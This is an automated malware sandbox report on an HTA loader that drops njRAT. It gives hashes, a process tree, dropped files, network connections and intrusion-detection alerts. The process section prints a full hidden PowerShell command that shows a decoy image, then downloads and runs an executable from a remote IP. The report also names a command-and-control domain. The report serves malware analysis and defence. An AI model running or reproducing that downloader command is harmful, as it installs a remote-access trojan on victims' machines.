analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

MSHTAPayload.hta

Full analysis: https://app.any.run/tasks/c0e0cad5-c4ed-4d80-85c5-ee2c751bcd20
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 16:19:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
trojan
rat
njrat
bladabindi
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5:

752E10CC7E3D57EAEF0B63094DF1F3FB

SHA1:

FB9D9925F81EA4823667962FA375BC7AD5FD2BD1

SHA256:

8588A06CD8766DA07E1ED5F9352C8C76167886D19B110021F2513E32E9E7DF99

SSDEEP:

96:wBvaY1zUMd6VfRjF/EOStk236yOlPXRM9:wb1zUrbeFk+pcPXRM9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • BnFNpE.exe (PID: 1516)
    • NJRAT was detected

      • RegAsm.exe (PID: 2616)
      • RegAsm.exe (PID: 2616)
    • Writes to a start menu file

      • BnFNpE.exe (PID: 1516)
    • Downloads executable files from IP

      • powershell.exe (PID: 2120)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2120)
    • Connects to CnC server

      • RegAsm.exe (PID: 2616)
  • SUSPICIOUS

    • Creates files in the program directory

      • BnFNpE.exe (PID: 1516)
    • Creates files in the user directory

      • powershell.exe (PID: 2120)
      • BnFNpE.exe (PID: 1516)
    • Connects to unusual port

      • RegAsm.exe (PID: 2616)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2120)
      • BnFNpE.exe (PID: 1516)
    • Executes PowerShell scripts

      • iexplore.exe (PID: 3184)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2848)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3184)
    • Changes internet zones settings

      • iexplore.exe (PID: 2848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

ContentType: text/html; charset=utf-8
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe no specs powershell.exe PhotoViewer.dll no specs bnfnpe.exe #NJRAT regasm.exe

Process information

PID
CMD
Path
Indicators
Parent process
2848"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayload.hta.htmlC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3184"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2848 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2120"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://i.imgur.com/8hxQpDI.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;;;;$peDirectURL = 'http://77.73.68.110/ftp84943/po.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://i.imgur.com/8hxQpDI.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;;;;$peDirectURL = 'http://77.73.68.110/ftp84943/po.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;;""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1504C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1516"C:\Users\admin\AppData\Roaming\BnFNpE.exe" C:\Users\admin\AppData\Roaming\BnFNpE.exe
powershell.exe
User:
admin
Company:
Tim Kosse
Integrity Level:
MEDIUM
Description:
FileZilla FTP Client
Exit code:
0
Version:
3.37.4
2616"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
BnFNpE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.6.1055.0 built by: NETFXREL2
Total events
1 729
Read events
1 563
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
5
Unknown types
1

Dropped files

PID
Process
Filename
Type
2848iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico
MD5:
SHA256:
2848iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X8G5Y36FLVIYR65TI7O5.temp
MD5:
SHA256:
2848iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF5993C52D2665103A.TMP
MD5:
SHA256:
2848iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{12998330-E372-11E8-9C83-5254004AAD11}.dat
MD5:
SHA256:
2848iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF6A9DD5AD0D020DD1.TMP
MD5:
SHA256:
2848iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{1299832F-E372-11E8-9C83-5254004AAD11}.dat
MD5:
SHA256:
1516BnFNpE.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\po.urltext
MD5:FF1CEFB2E930E6B0DFF2209EE4445FE5
SHA256:0A43313A8BFEADFD8C564E83F2BAE9F7A6CB575862DF1F525168A9A20C31295F
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1870a7.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2120
powershell.exe
GET
200
77.73.68.110:80
http://77.73.68.110/ftp84943/po.exe
RU
executable
809 Kb
suspicious
2848
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2848
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2120
powershell.exe
151.101.120.193:443
i.imgur.com
Fastly
US
malicious
2616
RegAsm.exe
23.105.131.148:8786
xcv2345892734hjsdf872384.publicvm.com
Nobis Technology Group, LLC
US
malicious
2120
powershell.exe
77.73.68.110:80
OOO Fishnet Communications
RU
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
i.imgur.com
  • 151.101.120.193
shared
xcv2345892734hjsdf872384.publicvm.com
  • 23.105.131.148
malicious

Threats

PID
Process
Class
Message
2120
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2120
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
2120
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2120
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2120
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2616
RegAsm.exe
A Network Trojan was detected
MALWARE [PTsecurity] njRAT.Gen RAT outbound connection
4 ETPRO signatures available at the full report
No debug info